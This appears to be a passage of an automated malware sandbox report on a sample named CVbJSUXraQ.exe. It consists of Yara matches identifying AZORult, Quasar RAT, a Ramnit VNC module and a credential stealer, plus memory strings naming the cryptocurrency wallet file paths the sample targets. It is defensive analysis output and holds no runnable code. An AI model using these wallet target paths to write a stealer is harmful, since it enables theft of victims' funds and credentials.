Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Yara detected Azorult

Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Detected AZORult Info Stealer

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004186C4		7_2_004186C4
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004186C4		7_2_004186C4

Yara detected Ramnit VNC Module

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: electrum.dat
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: Coins\Exodus
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: Coins\Ethereum
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Quasar RAT

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
